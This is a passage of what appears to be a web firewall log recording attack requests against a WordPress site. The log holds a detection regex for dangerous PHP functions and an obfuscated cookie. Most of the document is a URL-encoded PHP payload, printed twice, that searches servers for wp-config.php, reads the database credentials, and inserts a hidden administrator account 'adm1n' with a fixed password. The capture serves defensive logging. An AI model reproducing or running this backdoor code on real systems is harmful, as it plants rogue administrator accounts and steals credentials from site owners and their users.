A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B"]
["2026-05-16 18:01:52","213.209.159.254","POST","\/","Mozilla\/5.0 (Linux; Android 12; Pixel 6) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/99.0.4844.58 Mobile Safari\/537.36","post","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|chr|char|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> dl:%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B","POST \/ HTTP\/1.1\nsec-fetch-user:?1\nupgrade-insecure-requests:1\ncontent-length:12640\ncookie:4=0a64bb21b33726046f335a7dc8ae049c; 3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9pzS3qKWfMTIwo2EyXPEsHR9GISfvMTjvKFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYzAyoaEypvV7nJLbMzyfMI9jqKEsL29hqTIhqUZbWUNfWTZcXKgcozAfqJEyVPEjB0O1ozkcozfbWUNcB2I4nKD7sK19MTyyXPVuoz90q3W0LzjuVvx7; 1=53; 0=71\ncontent-type:application\/x-www-form-urlencoded\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\nsec-ch-ua:\" Not A;Brand\";v=\"99\", \"Chromium\";v=\"99\", \"Google Chrome\";v=\"99\"\nsec-fetch-site:none\nsec-ch-ua-mobile:?1\naccept-encoding:gzip,deflate\nsec-ch-ua-platform:\"Android\"\nsec-fetch-dest:document\nuser-agent:Mozilla\/5.0 (Linux; Android 12; Pixel 6) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/99.0.4844.58 Mobile Safari\/537.36\nhost:dewenlabels.com\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\nsec-fetch-mode:navigate\naccept:*\/*\n\ndl=%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B"]
